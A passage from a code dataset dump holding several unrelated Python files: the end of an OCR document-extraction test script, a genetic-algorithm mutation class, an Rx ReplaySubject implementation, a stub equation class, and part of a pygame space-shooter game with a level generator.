str(e)\n            text_patch_list = get_text_patch_from_image(image)\n            result_dict['page_' + str(e)] = {\n                'words': [],\n                'text_images': text_patch_list,\n                'numpy_image': image\n            }\n    elif extension == 'pdf':\n        pdf = PDF(io.BytesIO(binary_input))\n        images = convert_from_bytes(binary_input)\n        for e, page in enumerate(pdf.pages):\n            image = images[page.page_number - 1]\n            factor = float(image.size[0] / page.width)\n            image = np.asarray(image)\n            text_patch_list = []\n            image_area = image.shape[0] * image.shape[1]\n            print(\"image shape\", image.shape)\n            try:\n                is_scanned_image = False\n                if \"image\" in page.objects:\n\n                    if len(page.objects[\"image\"]) == 1:\n                        imageObject = page.objects[\"image\"][0]\n                        x0, x1, top, bottom = (round(float(imageObject[k]) * factor) for k in\n                                               ('x0', 'x1', 'top', 'bottom'))\n\n                        if (top, x0) == (0, 0) and abs(bottom - image.shape[0]) < 10 and abs(x1 - image.shape[1]) < 10:\n                            is_scanned_image = True\n                    else:\n                        for imageObject in page.objects[\"image\"]:\n                            x0, x1, top, bottom = (round(float(imageObject[k]) * factor) for k in\n                                                   ('x0', 'x1', 'top', 'bottom'))\n\n                            tp = image[top:bottom, x0:x1].copy()\n                            if ((bottom - top) * (x1 - x0)) >= 0.5 * image_area:\n                                # bigger image patch. 
Try detecting islands\n text_patch_list.extend(get_text_patch_from_image(tp))\n else:\n # smaller image patches save as a single text patch\n orientation = cvutils.get_text_orientation_using_word_width(tp)\n\n text = [x0, top, x1, bottom]\n if orientation == \"VERTICAL\":\n text_patch_key = str(text) + \"_V\"\n else:\n text_patch_key = str(text) + \"_H\"\n text_patch_list.append(text_patch_key)\n patches = []\n if not is_scanned_image:\n for patch in page.extract_words():\n x0, x1, top, bottom = (round(float(patch[k]) * factor) for k in\n ('x0', 'x1', 'top', 'bottom'))\n patches.append([[top, x0, bottom, x1], patch['text']])\n\n if len(patches) == 0:\n text_patch_list = get_text_patch_from_image(image)\n\n result_dict['page_' + str(e)] = {\n 'words': patches,\n 'text_images': text_patch_list,\n 'numpy_image': image\n }\n except OverflowError as err:\n text_patch_list = get_text_patch_from_image(image)\n result_dict['page_' + str(e)] = {\n 'words': [],\n 'text_images': text_patch_list,\n 'numpy_image': image\n }\n else:\n im = Image.open(io.BytesIO(binary_input))\n image = np.asarray(im)\n text_patch_list = get_text_patch_from_image(image)\n result_dict['page_0'] = {\n 'words': [],\n 'text_images': text_patch_list,\n 'numpy_image': image\n }\n\n return result_dict, document_name\n\n\ndef fetch_image_lines(image: np.ndarray):\n lines = cvutils.detect_lines(image)\n lines_dict = {\"horizontal_lines\": [], \"vertical_lines\": []}\n for line in lines:\n if (line[1] - line[3]) < (line[2] - line[0]):\n lines_dict[\"horizontal_lines\"].append([line[3], line[0], line[1], line[2]])\n else:\n lines_dict[\"vertical_lines\"].append([line[3], line[0], line[1], line[2]])\n return lines_dict\n\n\ndef fetch_image_bordered_tables(image: np.ndarray):\n coor_list = Bordered_Table(image).get_coordinate_list()\n return coor_list\n\n\nimport cv2\nimport imutils\nfrom IDP_pipeline.ocr.ocr_entities.rzt_ocr.rzt_ocr_entity import RZT_OCR\nfrom IDP_pipeline.ocr.ocr_entities.rzt_ocr.word_detector import RZTWordDetector\nimport os\nimport tensorflow as tf\nimport requests\n\nfrom IDP_pipeline.ocr.ocr_entities.rzt_ocr.lstm_prediction_model import PredictionModel as PredictionModel\nfrom IDP_pipeline.ocr.ocr_entities.google_cloud_vision.gv_ocr_entity import Google_Cloud_Vision_OCR\nimport json\nimport glob\n\n\ndef draw_patches_and_write_image(im, text_patch_list, evidences, word_list_key, file_path):\n img_with_patch = deepcopy(im)\n for text_patch_key in text_patch_list:\n t = eval(text_patch_key.split(\"_\")[0])\n orientation = text_patch_key.split(\"_\")[1]\n tp = im[t[1]:t[3], t[0]:t[2]].copy()\n\n image_gray = cv2.cvtColor(tp, cv2.COLOR_BGR2GRAY)\n image_bin = cv2.threshold(image_gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n if orientation == \"V\":\n tp = imutils.rotate_bound(tp, 90)\n\n for evidence_word in evidences[text_patch_key][word_list_key]:\n print(\"evidence word\", evidence_word)\n word = evidence_word[0]\n word_ = [word[0] + t[1], word[1] + t[0], word[2] + t[1], word[3] + t[0]]\n cv2.rectangle(img_with_patch, (t[0], t[1]), (t[2], t[3]), (255, 0, 0), 2)\n # cv2.rectangle(img_with_patch, (word_[1], word_[0]), (word_[3], word_[2]), (0, 0, 255), 2)\n cv2.imwrite(file_path, img_with_patch)\n\n\nif __name__ == \"__main__\":\n\n rules = json.load(open(rule_json))\n\n os.environ['CUDA_VISIBLE_DEVICES'] = str(0)\n config_sess = tf.ConfigProto()\n config_sess.gpu_options.per_process_gpu_memory_fraction = 0.2\n session = tf.InteractiveSession(config=config_sess)\n prediction_model = PredictionModel(\n 
model_dir=None,\n session=session)\n\n # site = 'http://192.168.60.45:5000'\n # filepath = \"/Users/sunilkumar/ocr/al_data/docs1/RW00275473_2017-12-01.pdf\"\n\n evidence_folder = root_folder + \"evidence/\"\n assembled_image_folder = root_folder + \"assembled_image/\"\n predicted_text_folder = root_folder + \"predicted_text/\"\n rzt_image_folder = root_folder + \"rzt_image/\"\n tesseract_image_folder = root_folder + \"tesseract_image/\"\n gv_image_folder = root_folder + \"gv_image/\"\n text_image_folder = root_folder + \"text_image_folder/\"\n fields_json_folder = root_folder + \"fields_json/\"\n fields_image_folder = root_folder + \"fields_image/\"\n\n if not os.path.isdir(fields_json_folder):\n os.mkdir(fields_json_folder)\n\n if not os.path.isdir(predicted_text_folder):\n os.mkdir(predicted_text_folder)\n\n if not os.path.isdir(fields_image_folder):\n os.mkdir(fields_image_folder)\n\n if not os.path.isdir(assembled_image_folder):\n os.mkdir(assembled_image_folder)\n\n if not os.path.isdir(tesseract_image_folder):\n os.mkdir(tesseract_image_folder)\n\n if not os.path.isdir(gv_image_folder):\n os.mkdir(gv_image_folder)\n\n if not os.path.isdir(rzt_image_folder):\n os.mkdir(rzt_image_folder)\n\n if not os.path.isdir(evidence_folder):\n os.mkdir(evidence_folder)\n\n if not os.path.isdir(text_image_folder):\n os.mkdir(text_image_folder)\n\n for filepath in glob.glob(image_folder + \"*\"):\n # for filepath in glob.glob(\"/Users/sunilkumar/ocr/Table_Data/highpeak/*.pdf\"):\n\n with open(filepath, \"rb\") as binfile:\n pdf_words, document_name = fetch_words(binfile.read(), filepath)\n\n print(\"Fetched words\", filepath, document_name)\n\n for page_key, val in pdf_words.items():\n page_file = document_name + \"_\" + page_key + \".json\"\n print(document_name, page_key)\n im = val[\"numpy_image\"]\n\n if not run_evidence and os.path.isfile(evidence_folder + page_file):\n print(\"Loading evidence from \", evidence_folder + page_file)\n with open(evidence_folder + page_file, \"r\") as evfile:\n assembled_evidence = json.load(evfile)\n else:\n print(\"Running evidence\")\n text_im = deepcopy(im)\n evidence_list = []\n text_patch_list = val[\"text_images\"]\n if \"rzt_ocr\" in required_evidences:\n rzt_evidences = {}\n for text_patch_key in text_patch_list:\n print(text_patch_key)\n t = eval(text_patch_key.split(\"_\")[0])\n orientation = text_patch_key.split(\"_\")[1]\n tp = im[t[1]:t[3], t[0]:t[2]].copy()\n color_ = (0, 0, 255)\n if orientation == \"V\":\n color_ = (255, 0, 0)\n cv2.rectangle(text_im, (t[0], t[1]), (t[2], t[3]), color_, 2)\n\n image_gray = cv2.cvtColor(tp, cv2.COLOR_BGR2GRAY)\n image_bin = cv2.threshold(image_gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n if cvutils.is_inverted_text_patch(image_bin):\n tp = (255 - tp).astype(np.uint8)\n\n if orientation == \"V\":\n tp = imutils.rotate_bound(tp, 90)\n\n rzt_evidence = RZT_OCR(image=tp.copy(), lstm_model=prediction_model,\n word_detector=RZTWordDetector.get_words_using_word_space_cluster).get_word_coordinates_with_string()\n print(rzt_evidence)\n\n rzt_evidences[text_patch_key] = rzt_evidence\n # draw and write rzt images\n image_file = rzt_image_folder + document_name + \"_\" + page_key + \".jpg\"\n draw_patches_and_write_image(im, text_patch_list, rzt_evidences, \"word_list\", image_file)\n evidence_list.append(rzt_evidences)\n\n cv2.imwrite(text_image_folder + document_name + \"_\" + page_key + \".jpg\", text_im)\n\n if \"tesseract\" in required_evidences:\n tesseract_evidences = {}\n for text_patch_key in 
text_patch_list:\n t = eval(text_patch_key.split(\"_\")[0])\n orientation = text_patch_key.split(\"_\")[1]\n\n tp = im[t[1]:t[3], t[0]:t[2]].copy()\n\n image_gray = cv2.cvtColor(tp, cv2.COLOR_BGR2GRAY)\n image_bin = cv2.threshold(image_gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n if cvutils.is_inverted_text_patch(image_bin):\n tp = (255 - tp).astype(np.uint8)\n\n if orientation == \"V\":\n tp = imutils.rotate_bound(tp, 90)\n\n # _, img_encoded = cv2.imencode('.jpg', tp)\n # response = requests.post(site + '/tesseract_evidence', data=img_encoded.tostring())\n # tesseract_json = response.json()\n\n tesseract_json = tesseract_evidence(tp)\n\n tesseract_evidences[text_patch_key] = {\n \"tesseract_words\": tesseract_json[\"tesseract_content\"]}\n evidence_list.append(tesseract_evidences)\n if \"google_cloud_vision\" in required_evidences:\n gv_evidences = {}\n for text_patch_key in text_patch_list:\n t = eval(text_patch_key.split(\"_\")[0])\n orientation = text_patch_key.split(\"_\")[1]\n\n tp = im[t[1]:t[3], t[0]:t[2]].copy()\n\n image_gray = cv2.cvtColor(tp, cv2.COLOR_BGR2GRAY)\n image_bin = cv2.threshold(image_gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n if cvutils.is_inverted_text_patch(image_bin):\n tp = (255 - tp).astype(np.uint8)\n\n if orientation == \"V\":\n tp = imutils.rotate_bound(tp, 90)\n # cv2.imwrite(\"/Users/sunilkumar/ocr/al_data/text_patches_r/\" + text_patch_key + \".jpg\",tp)\n\n gv_evidence = Google_Cloud_Vision_OCR(image=tp).get_word_coordinate_with_string()\n\n gv_evidences[text_patch_key] = gv_evidence\n evidence_list.append(gv_evidences)\n\n assembled_evidence = assemble_evidences(im, evidence_list, val[\"words\"], text_patch_list,\n required_evidences)\n\n # assembled_evidence[\"lines\"] = fetch_image_lines(im)\n # assembled_evidence[\"tables\"] = fetch_image_bordered_tables(im)\n print(page_key, assembled_evidence)\n fields = hypothesis(evidence=assembled_evidence, image=im, rules=rules)\n field_im = deepcopy(im)\n\n for page_result in fields:\n for field in page_result:\n print(field)\n cv2.rectangle(field_im, field[0][0], field[0][1], (0, 0, 255), 2)\n cv2.imwrite(fields_image_folder + document_name + \"_\" + page_key + \".jpg\", field_im)\n\n with open(fields_json_folder + document_name + \"_\" + page_key + \".json\", \"w\") as evfile:\n json.dump(fields, evfile)\n\n color_ = (255, 0, 0)\n thickness = 1\n with open(evidence_folder + page_file, \"w\") as evfile:\n json.dump(assembled_evidence, evfile)\n word_patch_with_string = dict()\n for word_key, word in assembled_evidence[\"evidence_words\"].items():\n color_ = (255, 0, 0)\n if word[\"true_pdf\"] == 1:\n color_ = (255, 0, 0)\n else:\n color_ = (0, 0, 255)\n\n thickness = 1\n # if word[\"stroke_width\"] > 2.9:\n # thickness= 3\n\n w = word[\"assembled_result\"][0]\n word_patch_with_string[tuple(w)] = word[\"assembled_result\"][1]\n cv2.rectangle(im, (w[1], w[0]), (w[3], w[2]), color_, thickness)\n cv2.imwrite(assembled_image_folder + document_name + \"_\" + page_key + \".jpg\", im)\n image_with_text = write_text_on_image(deepcopy(im), word_patch_with_string)\n cv2.imwrite(predicted_text_folder + document_name + \"_\" + page_key + \".jpg\", image_with_text)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":21237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"341920844","text":"# -*- coding: UTF-8 -*-\n# @Time : 2019/1/26 12:47 PM\n# @File : mutation.py\n# @Author : jian\nfrom __future__ import 
division\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nimport numpy as np\nimport random\n\n\nclass Mutation(object):\n def __init__(self, mutation_type, multi_points, adaptive=True, **kwargs):\n self.adaptive = adaptive\n self.mutation_type = mutation_type\n self.multi_points = multi_points # -1: auto (simulated annealing)\n self.generation = kwargs.get('generation', 0)\n self.max_generation = kwargs.get('max_generation', 1)\n self.k0 = kwargs.get('k0', 0.1)\n self.k1 = kwargs.get('k1', 1.0)\n\n def _mutate_based_matrices(self, *args, **kwargs):\n # fitness_values: [(index, fitness, gene, rate), (index, fitness, gene, rate), ...]\n fitness_values = kwargs['fitness_values']\n op_region = kwargs['op_region'] # (start, end)\n connection_region = kwargs['connection_region']\n\n N = len(fitness_values)\n M = fitness_values[0][2].shape[-1]\n\n C = np.zeros((N, 1)) # fitness cumulative probability of chromosome i,\n # can be considered as an information measure of chromosome i\n ordered_fitness = [(f[0], f[1]) for f in fitness_values]\n ordered_fitness = sorted(ordered_fitness, key=lambda x: x[1])\n ordered_fitness_values = np.array([m[1] for m in ordered_fitness])\n probability_fitness = ordered_fitness_values / np.sum(ordered_fitness_values)\n\n gamma = 1\n if self.adaptive:\n gamma = np.exp(float(self.generation)/float(self.max_generation * self.k0) - self.k1)\n\n probability_fitness = np.power(probability_fitness, gamma)\n probability_fitness = probability_fitness / np.sum(probability_fitness)\n\n c_sum = 0.0\n for a, b in zip(ordered_fitness, probability_fitness):\n index = a[0]\n c_sum += b\n C[index, 0] = c_sum\n\n # which individual should mutation\n alpha = 1.0 - C # the probability to choose which individual for mutation\n\n A = np.zeros((N, M))\n\n for n in range(N):\n A[n, :] = fitness_values[n][2]\n\n # which position in chromosome i should mutation\n sigma = np.sum(np.power(A - np.mean(A, 0), 2.0) * C, 0) / np.sum(C)\n\n mutation_result = []\n for f in fitness_values:\n # all individual should participate mutation process\n # mutation points number\n multi_points = self.multi_points if self.multi_points > 0 else int(alpha[f[0]] * M)\n\n # op region mutation\n op_multi_points = np.minimum(multi_points, op_region[1] - op_region[0])\n op_sigma = sigma[op_region[0]:op_region[1]]\n op_sigma = op_sigma / (np.sum(op_sigma) + 0.000000001)\n op_sigma = np.power(op_sigma, gamma)\n op_sigma = op_sigma / (np.sum(op_sigma) + 0.000000001)\n\n op_mutation_position = np.random.choice(list(range(op_region[1]-op_region[0])),\n op_multi_points,\n False,\n op_sigma)\n op_mutation_position = np.arange(op_region[0],op_region[1])[op_mutation_position].tolist()\n\n # connection region mutation\n connection_multi_points = np.minimum(multi_points, connection_region[1] - connection_region[0])\n connection_sigma = sigma[connection_region[0]:connection_region[1]]\n connection_sigma = connection_sigma / (np.sum(connection_sigma) + 0.000000001)\n connection_sigma = np.power(connection_sigma, gamma)\n connection_sigma = connection_sigma / (np.sum(connection_sigma) + 0.000000001)\n\n connection_mutation_position = np.random.choice(list(range(connection_region[1]-connection_region[0])),\n connection_multi_points,\n False,\n connection_sigma)\n connection_mutation_position = np.arange(connection_region[0],connection_region[1])[connection_mutation_position].tolist()\n mutation_result.append(f + (op_mutation_position+connection_mutation_position,))\n\n return mutation_result\n\n def 
_mutate_simple(self, *args, **kwargs):\n # fitness_values: [(index, fitness, gene, rate), (index, fitness, gene, rate), ...]\n fitness_values = kwargs['fitness_values']\n mutation_rate = kwargs['mutation_rate']\n gene_length = fitness_values[0][2].shape[-1]\n\n mutate_result = []\n for individual in fitness_values:\n if random.random() < mutation_rate:\n mutate_result.append(individual + (None,))\n else:\n mutation_position = random.choice(list(range(gene_length)))\n mutate_result.append((individual + (mutation_position,)))\n\n return mutate_result\n\n def adaptive_mutate(self, *args, **kwargs):\n if self.mutation_type.lower() == 'simple':\n return self._mutate_simple(*args, **kwargs)\n elif self.mutation_type.lower() == 'based_matrices':\n return self._mutate_based_matrices(*args, **kwargs)\n\n return None\n\n# mm = EvMutation('simple', -1, True, generation=10, max_generation=100, k0=0.1, k1=1.0)\n#\n# fitness_values = []\n#\n# for index in range(20):\n# fitness = random.random() * 10\n# gene = np.random.rand((10))\n# rate = random.random()\n# fitness_values.append((index, fitness, gene, rate))\n#\n# result = mm.mutate(fitness_values=fitness_values, mutation_rate=0.5)\n","sub_path":"antgo/automl/suggestion/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"489977008","text":"from typing import Iterable, Set, List\n\nfrom rx import config\nfrom rx.concurrency.schedulerbase import SchedulerBase\nfrom rx.core import Disposable\n\nfrom rxbackpressure.ack import Continue, Stop\nfrom rxbackpressure.observers.connectablesubscriber import ConnectableSubscriber\nfrom rxbackpressure.observables.iteratorasobservable import IteratorAsObservable\nfrom rxbackpressure.observable import Observable\nfrom rxbackpressure.observer import Observer\nfrom rxbackpressure.internal.promisecounter import PromiseCounter\nfrom rxbackpressure.scheduler import SchedulerBase\nfrom rxbackpressure.schedulers.currentthreadscheduler import CurrentThreadScheduler\n\n\nclass ReplaySubject(Observable, Observer):\n class State:\n def __init__(self,\n buffer: List,\n capacity: int,\n subscribers: Set = set(),\n length : int = 0,\n is_done: bool = False,\n error_thrown: Exception = None):\n self.buffer = buffer\n self.capacity = capacity\n self.subscribers = subscribers\n self.length = length\n self.is_done = is_done\n self.error_thrown = error_thrown\n\n def copy(self, buffer=None, length=None, subscribers=None):\n return ReplaySubject.State(buffer=buffer if buffer is not None else self.buffer,\n capacity=self.capacity,\n subscribers=subscribers if subscribers is not None else self.subscribers,\n length=length if length is not None else self.length,\n is_done=self.is_done,\n error_thrown=self.error_thrown)\n\n def append_elem(self, elem) -> 'ReplaySubject.State':\n if self.capacity == 0:\n return self.copy(buffer = self.buffer + [elem])\n elif self.length >= self.capacity:\n raise NotImplementedError\n else:\n return self.copy(buffer=self.buffer + [elem], length=self.length+1)\n\n def add_new_subscriber(self, s):\n subscribers = self.subscribers.copy()\n subscribers = subscribers | {s}\n\n new_state = self.copy(subscribers=subscribers)\n return new_state\n\n def remove_subscriber(self, to_remove):\n subscribers = self.subscribers.copy()\n if to_remove in subscribers: # todo: remove this\n subscribers.remove(to_remove)\n\n return self.copy(subscribers=subscribers)\n\n def mark_done(self, ex: 
Exception):\n return ReplaySubject.State(buffer=self.buffer, capacity=self.capacity, subscribers=set(),\n length=self.length, is_done=True, error_thrown=ex)\n\n def __init__(self, initial_state: State = None):\n self.state: ReplaySubject.State = initial_state or ReplaySubject.State(buffer=[], capacity=0)\n\n self.lock = config[\"concurrency\"].RLock()\n\n def unsafe_subscribe(self, observer: Observer, scheduler: SchedulerBase, subscribe_scheduler: SchedulerBase):\n \"\"\" Creates a new ConnectableSubscriber for each subscription, pushes the current buffer to the\n ConnectableSubscriber and connects it immediately\n\n \"\"\"\n\n def stream_on_done(buffer: Iterable, error_thrown: Exception = None) -> Disposable:\n class TObserver(Observer):\n\n def on_next(self, v):\n ack = observer.on_next(v)\n return ack\n\n def on_error(self, err):\n observer.on_error(err)\n\n def on_completed(self):\n if error_thrown is not None:\n observer.on_error(error_thrown)\n else:\n observer.on_completed()\n\n\n return IteratorAsObservable(iter(buffer)) \\\n .subscribe(TObserver(), scheduler, CurrentThreadScheduler())\n\n state = self.state\n buffer = state.buffer\n\n if state.is_done:\n return stream_on_done(buffer, state.error_thrown)\n else:\n c = ConnectableSubscriber(observer, scheduler=scheduler)\n with self.lock:\n new_state = self.state.add_new_subscriber(c)\n self.state = new_state\n\n c.push_first_all(buffer)\n ack, disposable = c.connect()\n\n if isinstance(ack, Stop):\n self.remove_subscriber(c)\n elif not isinstance(ack, Continue):\n def on_next(v):\n if isinstance(v, Stop):\n self.remove_subscriber(c)\n ack.subscribe(on_next=on_next)\n\n def _():\n try:\n self.remove_subscriber(c)\n finally:\n disposable.signal_stop()\n return Disposable.create(_)\n\n def on_complete_or_error(self, ex: Exception = None):\n with self.lock:\n state = self.state\n\n if not state.is_done:\n self.state = state.mark_done(ex)\n\n iterator = iter(state.subscribers)\n for obs in iterator:\n if ex is None:\n obs.on_completed()\n else:\n obs.on_error(ex)\n\n def remove_subscriber(self, s: ConnectableSubscriber):\n with self.lock:\n # print('remove subscriber')\n state = self.state\n new_state = state.remove_subscriber(s)\n self.state = new_state\n\n def on_next(self, elem):\n with self.lock:\n state = self.state\n if not state.is_done:\n self.state = state.append_elem(elem)\n\n iterator = iter(state.subscribers)\n result = None\n\n for obs in iterator:\n try:\n ack = obs.on_next(elem)\n except:\n raise NotImplementedError\n\n if isinstance(ack, Stop):\n self.remove_subscriber(obs)\n else:\n if result is None:\n result = PromiseCounter(Continue(), 1)\n result.acquire()\n\n def on_next(v):\n if isinstance(v, Continue):\n result.countdown()\n else:\n self.remove_subscriber(obs)\n result.countdown()\n\n ack.observe_on(obs.scheduler).subscribe(on_next)\n\n if result is None:\n return Continue()\n else:\n result.countdown()\n return result.promise\n\n def on_error(self, err):\n self.on_complete_or_error(err)\n\n def on_completed(self):\n self.on_complete_or_error()\n","sub_path":"rxbackpressure/subjects/replaysubject.py","file_name":"replaysubject.py","file_ext":"py","file_size_in_byte":6802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"188976033","text":"class LinearEquation:\n def __init__(self, a, b, c, d, e, f):\n self.a = a\n self.b = b\n self.c = c\n self.d = d\n self.e = e\n self.f = f\n\n def linear_equation(self, a: int, b: int, c: int, d: int, e: int, f: int):\n 
self.a = a\n self.b = b\n self.c = c\n self.d = d\n self.e = e\n self.f = f\n\n def isSovable():\n if 12 - 12 == 0:\n return True ","sub_path":"Assignment/Ass2.py","file_name":"Ass2.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"457694593","text":"import random\nimport sys\nfrom const import *\nfrom data import images, sounds, load_image\n\nplayer = None # Объект игрока, первоначально не задан\nall_sprites, my_group, lessons_group, fon_group = restart_sprites_for_lessons()\n\n\nclass PlayerLayout(pygame.sprite.Sprite):\n def __init__(self, x, y, layout_group):\n super().__init__(layout_group)\n self.image = images['player']\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n\nclass FalconLayout(pygame.sprite.Sprite):\n def __init__(self, x, y, layout_group):\n super().__init__(layout_group)\n self.image = images['falcon']\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n\ndef terminate():\n \"\"\"Функция для выхода\"\"\"\n pygame.quit()\n sys.exit()\n\n\ndef draw_start_screen(intro_text, sp, falcon_mode):\n screen.fill((0, 0, 0))\n Fon(-400, -200, fon_group, 1)\n fon_group.draw(screen)\n lay_group = get_sprites_group()\n if falcon_mode:\n FalconLayout(170, 450, lay_group)\n else:\n PlayerLayout(170, 450, lay_group)\n lay_group.draw(screen)\n font = pygame.font.Font(None, 50)\n text_coord = [(140, 70), (150, 200), (80, 260), (150, 320)]\n for line in range(len(intro_text)): # Загрузка текста\n string_rendered = font.render(intro_text[line], 1, pygame.Color('white'))\n intro_rect = string_rendered.get_rect()\n intro_rect.top = text_coord[line][1]\n intro_rect.x = text_coord[line][0]\n sp.append(intro_rect)\n screen.blit(string_rendered, intro_rect)\n return sp[1], sp[2], sp[3]\n\n\ndef start_screen(function_for_choice_mode_screen, falcon_mode):\n \"\"\"Выводит главное меню\"\"\"\n global music\n pygame.mouse.set_visible(True)\n sp = []\n intro_text = [\"PySpace\", 'Играть', 'Выбор корабля', \"Выход\"]\n if music == 0: # Запускаем музыку, если она ещё не играет\n pygame.mixer_music.load(sounds['main_theme'])\n pygame.mixer_music.play(-1)\n pygame.mixer_music.set_volume(0.6)\n music = 1\n play_button, choice_button, exit_button = draw_start_screen(intro_text, sp, falcon_mode)\n while True:\n for event in pygame.event.get(): # Ждём щелчка для показа уровней\n if event.type == pygame.QUIT or (\n event.type == pygame.MOUSEBUTTONDOWN and exit_button.collidepoint(event.pos)):\n terminate() # Выход\n elif event.type == pygame.MOUSEBUTTONDOWN and play_button.collidepoint(event.pos):\n return display_lessons(falcon_mode, function_for_choice_mode_screen)\n elif event.type == pygame.MOUSEBUTTONDOWN and choice_button.collidepoint(event.pos):\n falcon_mode = function_for_choice_mode_screen()\n play_button, choice_button, exit_button = draw_start_screen(intro_text, sp, falcon_mode)\n pygame.display.flip()\n clock.tick(FPS)\n\n\nclass Fon(pygame.sprite.Sprite):\n \"\"\" Класс фонов для игры\"\"\"\n\n def __init__(self, x, y, fon_gr, n, battle=False):\n \"\"\"Для инициализации нужны координаты, номер фона (также как для уровней) n,\n указание фон для битвы или нет batle\"\"\"\n super().__init__(all_sprites, fon_gr)\n if not battle:\n self.image = images[f'fon{n}']\n else:\n self.image = images[f'fonb{n}']\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.n = 0 # Счётчик\n\n\nclass MySprite(pygame.sprite.Sprite):\n \"\"\"Класс для 
стрелок"""\n\n    def __init__(self, pov, x, y): # Создаём спрайт\n        super().__init__(all_sprites, my_group)\n        if not pov: # Смотрим какая стрелка нам нужна\n            self.image = images['strelki']\n        else:\n            self.image = images['sterki1']\n        self.rect = self.image.get_rect()\n        self.rect.x = x\n        self.rect.y = y\n\n    def update(self, *args): # Смотрим, есть ли нажатие\n        if self.rect.collidepoint(args[0].pos):\n            return True\n        else:\n            return False\n\n\nclass Lesson(pygame.sprite.Sprite):\n    """Класс для показа значков уровней\n    Всего уровней 3"""\n\n    def __init__(self, n): # Создаём значок\n        super().__init__(lessons_group, all_sprites)\n        self.image = load_image(f'lesson{n}.png', -1)\n        self.rect = self.image.get_rect()\n        self.rect.x = 160\n        self.lesson_number = n\n        if n == 1: # Выбираем координату по высоте, которая подходит данному уровню\n            self.rect.y = 25\n        elif n == 2:\n            self.rect.y = 250\n        else:\n            self.rect.y = 475\n\n    def choice_music(self):\n        if self.lesson_number == 3: # Выбираем музыку, которая будет играть\n            pygame.mixer_music.load(sounds['boss_theme'])\n        else:\n            pygame.mixer_music.load(sounds['game_theme'])\n        pygame.mixer_music.play(-1)\n\n    def update(self, event, falcon_mode): # Смотрим на действия пользователя\n        if self.rect.collidepoint(event.pos):\n            self.choice_music()\n            return generate_level(\n                f'level{self.lesson_number}.txt'), self.lesson_number, falcon_mode # Возвращаем загруженный уровень\n        else:\n            return False\n\n\ndef display_lessons(falcon_mode, function_for_choice_mode_screen, lesson_number=None):\n    """Показываем уровни и запускаем их.\n    lesson_number нужно для того чтобы запускать определённый уровень без выбора пользователя.\n    Когда пользователь сам заходит, то lesson_number=None"""\n    global music\n    pygame.mouse.set_visible(True)\n    if lesson_number is None: # Случай, когда пользователь выбирает уровень\n        if music == 0: # Запускаем музыку, если она ещё не играет\n            pygame.mixer_music.load(sounds['main_theme'])\n            pygame.mixer_music.play(-1)\n            pygame.mixer_music.set_volume(0.6)\n            music = 1\n        screen.fill((0, 0, 0))\n        Fon(-10, -10, fon_group, 2)\n        for i in range(3): # Загружаем значки уровней\n            Lesson(i + 1)\n        MySprite(True, 0, 0) # Загружаем стрелочку\n        while True:\n            for event in pygame.event.get(): # Отслеживаем действия пользователя\n                if event.type == pygame.QUIT: # Выход\n                    terminate()\n                if event.type == pygame.MOUSEBUTTONDOWN: # Нажатие на уровень\n                    for i in lessons_group:\n                        answer = i.update(event, falcon_mode)\n                        if answer:\n                            return answer\n                    for i in my_group: # Нажатие на стрелку\n                        if i.update(event):\n                            return start_screen(function_for_choice_mode_screen, falcon_mode)\n            all_sprites.draw(screen)\n            pygame.display.flip()\n            clock.tick(FPS)\n    else: # Случай, когда пользователь нажал на кнопку по переходу на какой-то уровень, проходя уровень\n        for i in lessons_group:\n            if i.lesson_number == lesson_number:\n                i.choice_music()\n                pygame.mixer_music.set_volume(0.6)\n                music = 0\n                return generate_level(f'level{lesson_number}.txt'), lesson_number, falcon_mode\n\n\ndef generate_level(filename): # Собираем уровень\n    """Уровни изначально заданы только количеством врагов и волн\n    Конфигурация собирается в этом уровне по файлу из папки levels"""\n    filename = "levels/" + filename # Расположение файла\n    sp = []\n    with open(filename, mode='r') as map_file: # Открываем файл\n        text = map_file.readlines()\n    map_width = 9 # Количество возможных координат появления врагов и препятствий\n    for i in text[0].strip().split(';'): # Расшифровываем запись\n        sp1 = []\n        if not i:\n            continue\n        for 
j in range(0, len(i) - 1, 2):\n k = i[j]\n typ = i[j + 1] # Определяем тип врага\n if typ == 'm':\n elem = '*'\n else:\n elem = typ\n # m - астероиды\n # n - корабли врагов\n # b - босс\n sp1.extend((k, elem))\n sp.append(sp1) # Получаем список с количеством врагов\n map1 = []\n sp = sp[::-1]\n for i in range(len(sp)): # Формируем список строк с точным расположением врагов и свободных мест\n s = []\n for j in range(0, len(sp[i]) - 1, 2): # Собираем одну строку с всеми врагами в определённое время появления\n k = int(sp[i][j])\n elem = sp[i][j + 1]\n s += k * elem\n if map_width < len(s): # Исключаем возможные ошибки с слишком большим количеством врагов в уровне\n s = s[:map_width]\n print('Слишком много врагов, уровень обрезан')\n if not s.count('b') and not s.count('n'): # Если только метеориты в линии\n s += (map_width - len(s)) * '-' # Добавляем количество свободных мест\n random.shuffle(s) # Перемешиваем, чтобы добавить вариантов\n map1.append(''.join(s))\n elif not s.count('b') and s.count('n'): # Если только корабли в линии\n s = '--n'\n # Добавляем вражеский корабль, не важно где они будут стоять, так как они позиционируются по игроку\n s += (map_width - len(s)) * '-'\n map1.append(''.join(s))\n else: # Если есть босс\n level_width = map_width\n if level_width % 2 != 0: # Ставим босса по середине\n pl_xn = (level_width - 1) // 2\n else:\n pl_xn = level_width // 2\n sp1 = []\n for i1 in range(level_width):\n if i1 != pl_xn:\n sp1.append('-')\n else:\n sp1.append('b')\n map1.append(''.join(sp1))\n if 